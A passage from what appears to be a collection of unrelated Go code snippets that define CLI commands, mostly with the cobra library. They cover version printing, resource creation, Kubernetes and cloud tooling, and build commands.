`Get Devops Application Version List`,\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tc7nclient.InitClient(&clientConfig, &clientPlatformConfig)\n\t\t\terror := c7nclient.Client.CheckIsLogin()\n\t\t\tif error != nil {\n\t\t\t\tfmt.Println(error)\n\t\t\t\treturn\n\t\t\t}\n\t\t\terr, userInfo := c7nclient.Client.QuerySelf(cmd.OutOrStdout())\n\t\t\tif err != nil {\n\t\t\t\treturn\n\t\t\t}\n\t\t\terr = c7nclient.Client.SetProject(cmd.OutOrStdout(), userInfo.ID)\n\t\t\tif err != nil {\n\t\t\t\treturn\n\t\t\t}\n\t\t\terr, pro := c7nclient.Client.GetProject(cmd.OutOrStdout(), userInfo.ID, proCode)\n\t\t\tif err != nil {\n\t\t\t\treturn\n\t\t\t}\n\t\t\tc7nclient.Client.ListAppVersions(cmd.OutOrStdout(), &appCode, pro.ID)\n\t\t},\n\t}\n\n\tcmd.Flags().StringVarP(&appCode, \"appCode\", \"c\", \"\", \"app code\")\n\tcmd.MarkFlagRequired(\"appCode\")\n\n\treturn cmd\n}", "func NewCommand() *cobra.Command {\n\topts := &options{}\n\n\tcmd := &cobra.Command{\n\t\tUse: Name,\n\t\tShort: \"Launch the \" + Name,\n\t\tArgs: cobra.NoArgs,\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tverflag.PrintAndExitIfRequested()\n\n\t\t\tif err := opts.complete(); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif err := opts.validate(); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tlog, err := logger.NewZapLogger(opts.config.LogLevel, opts.config.LogFormat)\n\t\t\tif err != nil {\n\t\t\t\treturn fmt.Errorf(\"error instantiating zap logger: %w\", err)\n\t\t\t}\n\n\t\t\tlogf.SetLogger(log)\n\t\t\tklog.SetLogger(log)\n\n\t\t\tlog.Info(\"Starting \"+Name, \"version\", version.Get())\n\t\t\tcmd.Flags().VisitAll(func(flag *pflag.Flag) {\n\t\t\t\tlog.Info(fmt.Sprintf(\"FLAG: --%s=%s\", flag.Name, flag.Value)) //nolint:logcheck\n\t\t\t})\n\n\t\t\t// don't output usage on further errors raised during execution\n\t\t\tcmd.SilenceUsage = true\n\t\t\t// further errors will be logged properly, don't duplicate\n\t\t\tcmd.SilenceErrors = true\n\n\t\t\treturn run(cmd.Context(), log, opts.config)\n\t\t},\n\t}\n\n\tflags := cmd.Flags()\n\tverflag.AddFlags(flags)\n\topts.addFlags(flags)\n\n\treturn cmd\n}", "func NewCommand() *cobra.Command {\n\topts := &options{}\n\n\tcmd := &cobra.Command{\n\t\tUse: Name,\n\t\tShort: \"Launch the \" + Name,\n\t\tArgs: cobra.NoArgs,\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tverflag.PrintAndExitIfRequested()\n\n\t\t\tif err := opts.complete(); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif err := opts.validate(); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tlog, err := logger.NewZapLogger(opts.config.LogLevel, opts.config.LogFormat)\n\t\t\tif err != nil {\n\t\t\t\treturn fmt.Errorf(\"error instantiating zap logger: %w\", err)\n\t\t\t}\n\n\t\t\tlogf.SetLogger(log)\n\t\t\tklog.SetLogger(log)\n\n\t\t\tlog.Info(\"Starting \"+Name, \"version\", version.Get())\n\t\t\tcmd.Flags().VisitAll(func(flag *pflag.Flag) {\n\t\t\t\tlog.Info(fmt.Sprintf(\"FLAG: --%s=%s\", flag.Name, flag.Value)) //nolint:logcheck\n\t\t\t})\n\n\t\t\t// don't output usage on further errors raised during execution\n\t\t\tcmd.SilenceUsage = true\n\t\t\t// further errors will be logged properly, don't duplicate\n\t\t\tcmd.SilenceErrors = true\n\n\t\t\treturn run(cmd.Context(), log, opts.config)\n\t\t},\n\t}\n\n\tflags := cmd.Flags()\n\tverflag.AddFlags(flags)\n\topts.addFlags(flags)\n\n\treturn cmd\n}", "func New(version string, command *command.Cmd) CLI {\n\tapp := app.App{\n\t\tName: path.Base(os.Args[0]),\n\t\tDescription: command.Description,\n\t\tVersionString: version,\n\t\tHasSubCmds: false,\n\t}\n\treturn mkNew(app, command)\n}", "func CreateCommand(ca *common.CommonArgs) *cobra.Command {\n\tvar c command\n\tc = command{\n\t\tCommand: cobra.Command{\n\t\t\tUse: \"run\",\n\t\t\tShort: \"run observes the state of tugboat.lauches\",\n\t\t\tArgs: cobra.NoArgs,\n\t\t\tPreRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\t\treturn c.preexecute(cmd, args)\n\t\t\t},\n\t\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\t\treturn c.execute(cmd, args)\n\t\t\t},\n\t\t},\n\t\tCommonArgs: ca,\n\t\thttpFlagMgr: httpcliflags.New(),\n\t\tk8sFlagMgr: cliflags.New(),\n\t\tnotificationsFlagMgr: notificationscliflags.New(),\n\t}\n\n\tflags := c.Flags()\n\n\tc.httpFlagMgr.ConfigureHttpFlag(flags)\n\tc.k8sFlagMgr.ConfigureKubernetesConfig(flags)\n\tc.notificationsFlagMgr.ConfigureListenersFlag(flags)\n\n\treturn common.TraverseRunHooks(&c.Command)\n}", "func NewCommand() (cmd *cobra.Command) {\n\tcmd = &cobra.Command{Use: \"binctl\", Run: func(cmd *cobra.Command, args []string) {\n\t\t//fmt.Println(\"Operate pipeline\")\n\t\t//fmt.Println(\"init binctl\")\n\t}}\n\tcmd.AddCommand(cmdMemory())\n\tcmd.AddCommand(cmdPipeline())\n\tcmd.PersistentFlags().String(\"config\", \"./configs/binlogo.yaml\", \"config file default is ./configs/binlogo.yaml\")\n\terr := viper.BindPFlag(\"config\", cmd.PersistentFlags().Lookup(\"config\"))\n\t// configs.InitViperFromFile(viper.GetString(\"config\"))\n\tconfigs.Init(viper.GetString(\"config\"))\n\t//etcd2.DefaultETCD()\n\tblog.Env(configs.Env(viper.GetString(\"env\")))\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\treturn\n}", "func BuildVersionString() string {\n\tprogram := \"k8s-device-plugin\"\n\n\tversion := \"v\" + CurrentVersion.String()\n\tif CommitHash != \"\" {\n\t\tversion += \"-\" + strings.ToUpper(CommitHash)\n\t}\n\n\tosArch := runtime.GOOS + \"/\" + runtime.GOARCH\n\n\tdate := BuildDate\n\tif date == \"\" {\n\t\tdate = \"unknown\"\n\t}\n\n\treturn fmt.Sprintf(\"%s %s %s BuildDate: %s\", program, version, osArch, date)\n\n}", "func newCreateCmd() *cobra.Command {\n\tcreateCmd := cobra.Command{\n\t\tUse: \"create\",\n\t\tShort: `Create a new verless object`,\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\treturn cmd.Help()\n\t\t},\n\t}\n\n\tcreateCmd.AddCommand(newCreateProjectCmd())\n\tcreateCmd.AddCommand(newCreateThemeCmd())\n\tcreateCmd.AddCommand(newCreateFile())\n\n\treturn &createCmd\n}", "func CreateCommand() *cobra.Command {\n\treturn base.CreateCommand(\"template\", \"Create vt template from xml\", New())\n}", "func init() {\n\tcmd.Root.AddCommand(version)\n}", "func NewCmd(octaviusDaemon daemon.Client, fileUtil file.File) *cobra.Command {\n\tvar metadataFilePath string\n\n\tcreateCmd := &cobra.Command{\n\t\tUse: \"create\",\n\t\tShort: \"Create new octavius job metadata\",\n\t\tLong: \"This command helps create new job metadata to your CP host with proper metadata.json file\",\n\t\tExample: fmt.Sprintf(\"octavius create --job-path <filepath>/metadata.json\"),\n\t\tArgs: cobra.MaximumNArgs(0),\n\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\n\t\t\tprinter.Println(\"Creating a new job.\", color.FgBlack)\n\t\t\tmetadataFileIoReader, err := fileUtil.GetIoReader(metadataFilePath)\n\t\t\tif err != nil {\n\t\t\t\tlog.Error(err, \"error in reading file\")\n\t\t\t\tprinter.Println(fmt.Sprintf(\"error in reading file %v\", err.Error()), color.FgRed)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tclient := &client.GrpcClient{}\n\t\t\tres, err := octaviusDaemon.Post(metadataFileIoReader, client)\n\t\t\tif err != nil {\n\t\t\t\tlog.Error(err, \"error in creating metadata\")\n\t\t\t\tprinter.Println(fmt.Sprintf(\"error in creating metadata, %v\", status.Convert(err).Message()), color.FgRed)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tlog.Info(fmt.Sprintf(\"%s job created\", res.Name))\n\t\t\tprinter.Println(fmt.Sprintf(\"%s job created\", res.Name), color.FgGreen)\n\t\t},\n\t}\n\tcreateCmd.Flags().StringVarP(&metadataFilePath, \"job-path\", \"\", \"\", \"path to metadata.json(required)\")\n\terr := createCmd.MarkFlagRequired(\"job-path\")\n\tif err != nil {\n\t\tlog.Error(err, \"error while setting the flag required\")\n\t\tprinter.Println(\"error while setting the flag required\", color.FgRed)\n\t\treturn nil\n\t}\n\treturn createCmd\n}", "func NewCommand(\n\tname string,\n\tdescription string,\n\tversion string,\n\tnameConvertFunc spec.AttributeNameConverterFunc,\n\ttypeConvertFunc spec.AttributeTypeConverterFunc,\n\ttypeMappingName string,\n\tgeneratorFunc func([]spec.SpecificationSet, string) error,\n) *cobra.Command {\n\n\tcobra.OnInitialize(func() {\n\t\tviper.SetEnvPrefix(name)\n\t\tviper.AutomaticEnv()\n\t\tviper.SetEnvKeyReplacer(strings.NewReplacer(\"-\", \"_\"))\n\t})\n\n\tvar rootCmd = &cobra.Command{\n\t\tUse: name,\n\t\tShort: description,\n\t}\n\n\trootCmd.PersistentFlags().StringP(\"out\", \"o\", \"codegen\", \"Default output path.\")\n\n\tvar versionCmd = &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Prints the version and exit.\",\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tfmt.Println(version)\n\t\t},\n\t}\n\n\tvar cmdFolderGen = &cobra.Command{\n\t\tUse: \"folder\",\n\t\tShort: \"Generate the model using a local directory containing the specs.\",\n\t\tSilenceUsage: true,\n\t\tSilenceErrors: true,\n\t\tPreRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\treturn viper.BindPFlags(cmd.Flags())\n\t\t},\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\n\t\t\tif len(viper.GetStringSlice(\"dir\")) == 0 {\n\t\t\t\treturn errors.New(\"--dir is required\")\n\t\t\t}\n\n\t\t\tvar specSets []spec.SpecificationSet\n\n\t\t\tfor _, dir := range viper.GetStringSlice(\"dir\") {\n\t\t\t\tset, err := spec.LoadSpecificationSet(\n\t\t\t\t\tdir,\n\t\t\t\t\tnameConvertFunc,\n\t\t\t\t\ttypeConvertFunc,\n\t\t\t\t\ttypeMappingName,\n\t\t\t\t)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\n\t\t\t\tspecSets = append(specSets, set)\n\t\t\t}\n\n\t\t\treturn generatorFunc(specSets, viper.GetString(\"out\"))\n\t\t},\n\t}\n\tcmdFolderGen.Flags().StringSliceP(\"dir\", \"d\", nil, \"Path of the specifications folder.\")\n\n\tvar githubGen = &cobra.Command{\n\t\tUse: \"github\",\n\t\tShort: \"Generate the model using a remote github repository.\",\n\t\tSilenceUsage: true,\n\t\tSilenceErrors: true,\n\t\tPreRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\treturn viper.BindPFlags(cmd.Flags())\n\t\t},\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\n\t\t\tspecSet, err := spec.LoadSpecificationSetFromGithub(\n\t\t\t\tviper.GetString(\"token\"),\n\t\t\t\tviper.GetString(\"repo\"),\n\t\t\t\tviper.GetString(\"ref\"),\n\t\t\t\tviper.GetString(\"path\"),\n\t\t\t\tnameConvertFunc,\n\t\t\t\ttypeConvertFunc,\n\t\t\t\ttypeMappingName,\n\t\t\t)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\treturn generatorFunc([]spec.SpecificationSet{specSet}, viper.GetString(\"out\"))\n\t\t},\n\t}\n\tgithubGen.Flags().StringP(\"repo\", \"r\", \"\", \"Endpoint for the github api.\")\n\tgithubGen.Flags().StringP(\"path\", \"p\", \"\", \"Internal path to a directory in the repo if not in the root.\")\n\tgithubGen.Flags().StringP(\"ref\", \"R\", \"master\", \"Branch or tag to use.\")\n\tgithubGen.Flags().StringP(\"token\", \"t\", \"\", \"The api token to use.\")\n\n\trootCmd.AddCommand(\n\t\tversionCmd,\n\t\tcmdFolderGen,\n\t\tgithubGen,\n\t)\n\n\treturn rootCmd\n}", "func TestVersionCommand(t *testing.T) {\n\tt.Run(\"Tests if prints current version\", func(t *testing.T) {\n\t\tout, err := test.CaptureCommandOutput(versionCmd, nil)\n\n\t\trequire.NoError(t, err)\n\t\trequire.Equal(t, fmt.Sprintf(\"%s\\n\", getVersion()), out)\n\t})\n}", "func Command() *cobra.Command {\n\treturn &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Shows current version of kyverno.\",\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tfmt.Printf(\"Version: %s\\n\", version.Version())\n\t\t\tfmt.Printf(\"Time: %s\\n\", version.Time())\n\t\t\tfmt.Printf(\"Git commit ID: %s\\n\", version.Hash())\n\t\t\treturn nil\n\t\t},\n\t}\n}", "func runVersion(cmd *cmd.Cmd, args []string) error {\n\tif len(args) != 0 {\n\t\treturn errVersionArgs\n\t}\n\n\tfmt.Printf(\"Gorot %s\\n\", gorot.Version)\n\n\treturn nil\n}", "func NewCmd(name, fullName string) *cobra.Command {\n\treturn &cobra.Command{\n\t\tUse: name,\n\t\tShort: \"Print the version information\",\n\t\tLong: \"Print the version information\",\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tfmt.Printf(\"kam version %s\\n\", Version)\n\t\t},\n\t}\n}", "func buildVersion(short bool) string {\n\tvar b bytes.Buffer\n\tb.WriteString(\"MicroService-UserPowerManager v\" + MajorVersion + \".\" + MinorVersion)\n\t// versionStr := fmt.Sprintf(\"MicroService-UserPowerManager v%s.%s\",\n\t// \tMajorVersion, MinorVersion)\n\tif !IsRelease {\n\t\tb.WriteString(\" pre-release.\\n\")\n\t\tif !short {\n\t\t\tb.WriteString(PrereleaseBlurb + \"\\n\")\n\t\t}\n\t} else {\n\t\tb.WriteString(\" release.\\n\")\n\t}\n\tif short {\n\t\treturn b.String()\n\t}\n\tb.WriteString(Copyright + \"\\n\")\n\tb.WriteString(fmt.Sprintf(`Git Commit: %v\nGit Revision: %v\nGolang Build Version: %v\nBuild User: %v@%v\nBuild Status: %v\nBuild Time: %v\n`,\n\t\tbuildGitCommit,\n\t\tbuildGitRevision,\n\t\tbuildGolangVersion,\n\t\tbuildUser,\n\t\tbuildHost,\n\t\tbuildStatus,\n\t\tbuildTime))\n\tb.WriteString(GitHub + \"\\n\")\n\tb.WriteString(Issues + \"\\n\")\n\treturn b.String()\n}", "func versionRunner(cmd *cobra.Command, args []string) {\n\tfmt.Println(\"Passgen : Password generator for general purpose - v2\")\n}", "func newCommand(name, argsSpec, description string, init func(*flag.FlagSet), f func(*flag.FlagSet) error) command {\n\tfs := flag.NewFlagSet(name, flag.ExitOnError)\n\tinit(fs)\n\tif fs.Usage == nil {\n\t\tfs.Usage = func() {\n\t\t\tfmt.Fprintln(os.Stderr, \"#\", description)\n\t\t\tfmt.Fprintln(os.Stderr, name, argsSpec)\n\t\t\tfs.PrintDefaults()\n\t\t}\n\t}\n\treturn command{fs, f}\n}", "func Command() *cobra.Command {\n\treturn &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Show the sensuctl version information\",\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tversion.Println(\"sensuctl\")\n\t\t},\n\t\tAnnotations: map[string]string{\n\t\t\thooks.ConfigurationRequirement: hooks.ConfigurationNotRequired,\n\t\t},\n\t}\n}", "func main() {\n\tlog.Printf(\"Build var 'version' is: %s\", version)\n\tlog.Printf(\"Build var 'time' is: %s\", buildDate)\n\tcmd.Execute()\n}", "func (r *ConfigAuditReportReconciler) buildCommand(workloadInfo string) string {\n\tworkloadInfos := strings.Split(workloadInfo, \"|\")\n\tworkloadType := workloadInfos[0]\n\tworkloadName := workloadInfos[1]\n\n\treturn \"starboard -n \" + r.NamespaceWatched + \" get report \" + workloadType + \"/\" + workloadName + \" > \" + buildReportName(workloadType, workloadName)\n}", "func NewCommand(in io.Reader, out io.Writer, err io.Writer) *cobra.Command {\n\toptions := icrbuild.NewBuildOptions(in, out, err)\n\tcmd := &cobra.Command{\n\t\tUse: \"icrbuild [DIRECTORY]\",\n\t\tShort: \"Build a Docker image in IBM Cloud Container Registry using builder contract\",\n\t\tArgs: cobra.ExactArgs(1),\n\t\tLong: `\n `,\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\terr := options.Run(cmd, args)\n\t\t\tif err != nil {\n\t\t\t\tlogrus.Error(err)\n\t\t\t}\n\t\t},\n\t\tPersistentPreRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tif err := setUpLogs(err); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tcmd.SilenceUsage = true\n\t\t\tlogrus.Infof(\"icrbuild %+v\", version.Get())\n\t\t\treturn nil\n\t\t},\n\t}\n\n\tcmd.Version = fmt.Sprintf(\"%+v\", version.Get())\n\tcmd.SetVersionTemplate(\"{{printf .Version}}\\n\")\n\n\t//\t[--no-cache] [--pull] [--quiet | -q] [--build-arg KEY=VALUE ...] [--file FILE | -f FILE] --tag TAG DIRECTORY\n\tcmd.PersistentFlags().BoolVar(&options.Flags.NoCache, \"no-cache\", false, \"Optional: If specified, cached image layers from previous builds are not used in this build.\")\n\tcmd.PersistentFlags().BoolVar(&options.Flags.Pull, \"pull\", false, \"Optional: If specified, the base images are pulled even if an image with a matching tag already exists on the build host.\")\n\tcmd.PersistentFlags().BoolVarP(&options.Flags.Quiet, \"quiet\", \"q\", false, \"Optional: If specified, the build output is suppressed unless an error occurs.\")\n\tcmd.PersistentFlags().StringArrayVar(&options.Flags.BuildArgs, \"build-arg\", nil, \"Optional: Specify an additional build argument in the format 'KEY=VALUE'. The value of each build argument is available as an environment variable when you specify an ARG line that matches the key in your Dockerfile.\")\n\tcmd.PersistentFlags().StringVarP(&options.Flags.File, \"file\", \"f\", \"\", \"Optional: Specify the location of the Dockerfile relative to the build context. If not specified, the default is 'PATH/Dockerfile', where PATH is the root of the build context.\")\n\tcmd.PersistentFlags().StringVarP(&options.Flags.Tag, \"tag\", \"t\", \"\", \"The full name for the image that you want to build, which includes the registry URL and namespace.\")\n\tcmd.MarkFlagRequired(\"tag\")\n\n\treturn cmd\n}", "func CreateCommand(s string) Command {\n\tfmt.Println(\"Creating command\")\n\n\treturn &ConsoleOutput{\n\t\tmessage: s,\n\t}\n}", "func Command(app *kingpin.Application) {\n\tcmd := new(cmdVersion)\n\tapp.Command(\"version\", fmt.Sprintf(\"Prints %s version\", app.Name)).Action(cmd.run)\n}", "func createCommand() cli.Command {\n\treturn cli.Command{\n\t\tName: \"create\",\n\t\tBefore: survey.RequireGlobalFlagsFunc(requiredFlags...),\n\t\tAction: create(),\n\t}\n}", "func CreateConsensusAuthCoinInfoCmd(cli *client.CommandLineClient) error {\n\tbc, err := client.NewLazyBaseClientFromCommandLineClient(cli)\n\tif err != nil {\n\t\treturn err\n\t}\n\tcreateAuthCoinCmd(cli, NewPluginConsensusClient(bc), cli.ConsensusCmd)\n\treturn nil\n}", "func CreateParamsCmd() *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"zk\",\n\t\tShort: \"zk knowledge related parameters\",\n\t}\n\tcmd.AddCommand(mixCreateZkKeyCmd())\n\tcmd.AddCommand(mixReadZkKeyCmd())\n\n\treturn cmd\n}", "func createCmd() *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"create\",\n\t\tShort: \"Create a Windows instance on the same provider as the existing OpenShift Cluster.\",\n\t\tLong: \"creates a Windows instance under the same virtual network (AWS-VCP, Azure-Vnet, \" +\n\t\t\t\"and etc.) used by a given OpenShift cluster running on the selected provider. \" +\n\t\t\t\"The created instance would be ready to join the OpenShift Cluster as a worker node.\",\n\t\tPreRunE: func(cmd *cobra.Command, _ []string) error {\n\t\t\treturn validateCreateFlags(cmd)\n\t\t},\n\t\tRunE: func(_ *cobra.Command, _ []string) error {\n\t\t\tcloud, err := cloudprovider.CloudProviderFactory(rootInfo.kubeconfigPath, rootInfo.credentialPath,\n\t\t\t\trootInfo.credentialAccountID, rootInfo.resourceTrackerDir)\n\t\t\tif err != nil {\n\t\t\t\treturn fmt.Errorf(\"error creating cloud provider clients, %v\", err)\n\t\t\t}\n\t\t\terr = cloud.CreateWindowsVM(createFlagInfo.imageID, createFlagInfo.instanceType, createFlagInfo.sshKey)\n\t\t\tif err != nil {\n\t\t\t\treturn fmt.Errorf(\"error creating Windows Instance, %v\", err)\n\t\t\t}\n\t\t\treturn nil\n\t\t},\n\t}\n\n\tcmd.PersistentFlags().StringVar(&createFlagInfo.imageID, \"image-id\", \"\",\n\t\t\"ami ID of a base image for the instance (i.e.\"+\n\t\t\t\": ami-06a4e829b8bbad61e for Microsoft Windows Server 2019 Base image on AWS). (required)\")\n\tcmd.PersistentFlags().StringVar(&createFlagInfo.instanceType, \"instance-type\", \"\",\n\t\t\"name of a type of instance (i.e.: m4.large for AWS, etc). (required)\")\n\tcmd.PersistentFlags().StringVar(&createFlagInfo.sshKey, \"ssh-key\", \"\",\n\t\t\"name of existing ssh key on cloud provider for accessing the instance after it is created. (required)\")\n\treturn cmd\n}", "func NewCmdURLCreate(name, fullName string) *cobra.Command {\n\to := NewURLCreateOptions()\n\turlCreateCmd := &cobra.Command{\n\t\tUse: name + \" [url name]\",\n\t\tShort: urlCreateShortDesc,\n\t\tLong: urlCreateLongDesc,\n\t\tExample: fmt.Sprintf(urlCreateExample, fullName),\n\t\tArgs: cobra.MaximumNArgs(1),\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tgenericclioptions.GenericRun(o, cmd, args)\n\t\t},\n\t}\n\turlCreateCmd.Flags().IntVarP(&o.urlPort, \"port\", \"\", -1, \"Port number for the url of the component, required in case of components which expose more than one service port\")\n\t// if experimental mode is enabled, add more flags to support ingress creation or docker application based on devfile\n\to.isExperimental = experimental.IsExperimentalModeEnabled()\n\tif o.isExperimental {\n\t\to.isDocker = pushtarget.IsPushTargetDocker()\n\t\tif o.isDocker {\n\t\t\turlCreateCmd.Flags().IntVarP(&o.exposedPort, \"exposed-port\", \"\", -1, \"External port to the application container\")\n\t\t\turlCreateCmd.Flags().BoolVarP(&o.forceFlag, \"force\", \"f\", false, \"Don't ask for confirmation, assign an exposed port directly\")\n\t\t\turlCreateCmd.Example = fmt.Sprintf(urlCreateExampleDocker, fullName)\n\t\t} else {\n\t\t\turlCreateCmd.Flags().StringVar(&o.tlsSecret, \"tls-secret\", \"\", \"TLS secret name for the url of the component if the user bring their own TLS secret\")\n\t\t\turlCreateCmd.Flags().StringVarP(&o.host, \"host\", \"\", \"\", \"Cluster IP for this URL\")\n\t\t\turlCreateCmd.Flags().BoolVarP(&o.secureURL, \"secure\", \"\", false, \"Create a secure HTTPS URL\")\n\t\t\turlCreateCmd.Flags().BoolVar(&o.wantIngress, \"ingress\", false, \"Create an Ingress instead of Route on OpenShift clusters\")\n\t\t\turlCreateCmd.Example = fmt.Sprintf(urlCreateExampleExperimental, fullName)\n\t\t}\n\t} else {\n\t\turlCreateCmd.Flags().BoolVarP(&o.secureURL, \"secure\", \"\", false, \"Create a secure HTTPS URL\")\n\t\turlCreateCmd.Example = fmt.Sprintf(urlCreateExample, fullName)\n\t}\n\tgenericclioptions.AddNowFlag(urlCreateCmd, &o.now)\n\to.AddContextFlag(urlCreateCmd)\n\tcompletion.RegisterCommandFlagHandler(urlCreateCmd, \"context\", completion.FileCompletionHandler)\n\n\treturn urlCreateCmd\n}", "func initVersionInfo() {\n\tversion.Version = pmmVersion.Version\n\tversion.Revision = pmmVersion.FullCommit\n\tversion.Branch = pmmVersion.Branch\n\n\tif buildDate, err := strconv.ParseInt(pmmVersion.Timestamp, 10, 64); err != nil {\n\t\tversion.BuildDate = time.Unix(0, 0).Format(versionDataFormat)\n\t} else {\n\t\tversion.BuildDate = time.Unix(buildDate, 0).Format(versionDataFormat)\n\t}\n\n\tif pmmVersion.PMMVersion != \"\" {\n\t\tversion.Version += \"-pmm-\" + pmmVersion.PMMVersion\n\t\tkingpin.Version(pmmVersion.FullInfo())\n\t} else {\n\t\tkingpin.Version(version.Print(program))\n\t}\n\n\tkingpin.HelpFlag.Short('h')\n\tkingpin.CommandLine.Help = fmt.Sprintf(\"%s exports various MongoDB metrics in Prometheus format.\\n\", pmmVersion.ShortInfo())\n}", "func (opts *Options) CreateCommand() string {\n\tparts := []string{\"openssl pkcs12 -export\"}\n\treturn opts.Stringify(parts)\n}", "func buildInfo(c *cli.Context) error {\n\trepo := c.Args().First()\n\towner, name, err := parseRepo(repo)\n\tif err != nil {\n\t\treturn err\n\t}\n\tnumber, err := strconv.Atoi(c.Args().Get(1))\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tclient, err := newClient(c)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tbuild, err := client.Build(owner, name, number)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\ttmpl, err := template.New(\"_\").Parse(c.String(\"format\"))\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn tmpl.Execute(os.Stdout, build)\n}", "func NewCommand(out io.Writer, fs fs.FileSystem, rf *resmap.Factory, ptf transformer.Factory) *cobra.Command {\n\tops := NewCommandOptions()\n\n\tcmd := &cobra.Command{\n\t\tUse: \"build [path]\",\n\t\tShort: \"Print current configuration per contents of \" + constants.KustomizationFileName,\n\t\tExample: examples,\n\t\tSilenceUsage: true,\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\terr := ops.Validate(args)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\treturn ops.Run(out, fs, rf, ptf)\n\t\t},\n\t}\n\n\tops.SetFlags(cmd.Flags())\n\n\treturn cmd\n}", "func NewCommand(version string) *cobra.Command {\n\trootCommand := &cobra.Command{\n\t\tUse: name,\n\t\tVersion: version,\n\t}\n\trootCommand.SetOut(logrus.New().Out)\n\n\tfor _, sourceProvider := range source.GetProviderList() {\n\t\tsourceCmd := &cobra.Command{\n\t\t\tUse: sourceProvider.Name(),\n\t\t\tShort: fmt.Sprintf(`Fetch data from source \"%s\"`, sourceProvider.Name()),\n\t\t}\n\t\tif sourceProvider.Deprecated() {\n\t\t\tsourceCmd.Deprecated = fmt.Sprintf(`source \"%s\" is deprecated`, sourceProvider.Name())\n\t\t}\n\t\tfor _, registryProvider := range registry.GetProviderList() {\n\t\t\tregistryCmd := &cobra.Command{\n\t\t\t\tUse: registryProvider.Name(),\n\t\t\t\tShort: fmt.Sprintf(`Save data in registry \"%s\"`, registryProvider.Name()),\n\t\t\t}\n\t\t\tif registryProvider.Deprecated() {\n\t\t\t\tregistryCmd.Deprecated = fmt.Sprintf(`registry \"%s\" is deprecated`, registryProvider.Name())\n\t\t\t}\n\t\t\tonceCommand := &cobra.Command{\n\t\t\t\tUse: `once`,\n\t\t\t\tShort: `Run main process only once: sync and return result`,\n\t\t\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\t\t\tmanager, cleanup, err := newManager(cmd.Flags(), sourceProvider.Factory(), registryProvider.Factory())\n\t\t\t\t\tif cleanup != nil {\n\t\t\t\t\t\tcleanup()\n\t\t\t\t\t}\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn errors.Wrap(err, `failed to bootstrap manager`)\n\t\t\t\t\t}\n\t\t\t\t\treturn manager.Run(cmd.Context())\n\t\t\t\t},\n\t\t\t}\n\t\t\twatchCommand := &cobra.Command{\n\t\t\t\tUse: `watch`,\n\t\t\t\tShort: `Run main process as daemon: sync repeatedly with constant interval`,\n\t\t\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\t\t\tsc, cleanup, err := newScheduler(cmd.Flags(), sourceProvider.Factory(), registryProvider.Factory())\n\t\t\t\t\tif cleanup != nil {\n\t\t\t\t\t\tcleanup()\n\t\t\t\t\t}\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn errors.Wrap(err, `failed to bootstrap scheduler`)\n\t\t\t\t\t}\n\t\t\t\t\tsc.Run(cmd.Context())\n\t\t\t\t\treturn nil\n\t\t\t\t},\n\t\t\t}\n\t\t\twatchCommand.Flags().Duration(`scheduler.interval`, time.Minute, `Interval between manager runs (1s, 1m, 5m, 1h and others)`)\n\t\t\tregistryCmd.PersistentFlags().Bool(`manager.continue-on-error`, false, `Omit errors during process manager`)\n\t\t\tregistryCmd.PersistentFlags().Bool(`manager.exit-on-error`, false, `Stop manager process on first error and by pass it to command line`)\n\t\t\t_ = registryCmd.PersistentFlags().MarkDeprecated(`manager.continue-on-error`, `Flag \"manager.continue-on-error\" is deprecated, use \"manager.exit-on-error\" instead`)\n\t\t\t_ = registryCmd.PersistentFlags().MarkHidden(`manager.continue-on-error`)\n\t\t\tregistryCmd.PersistentFlags().AddFlagSet(registryProvider.Flags())\n\t\t\tregistryCmd.AddCommand(onceCommand)\n\t\t\tregistryCmd.AddCommand(watchCommand)\n\t\t\tsourceCmd.AddCommand(registryCmd)\n\t\t}\n\t\tsourceCmd.PersistentFlags().AddFlagSet(sourceProvider.Flags())\n\t\trootCommand.AddCommand(sourceCmd)\n\t}\n\trootCommand.PersistentFlags().String(`logger.level`, logrus.InfoLevel.String(), `Log level`)\n\treturn 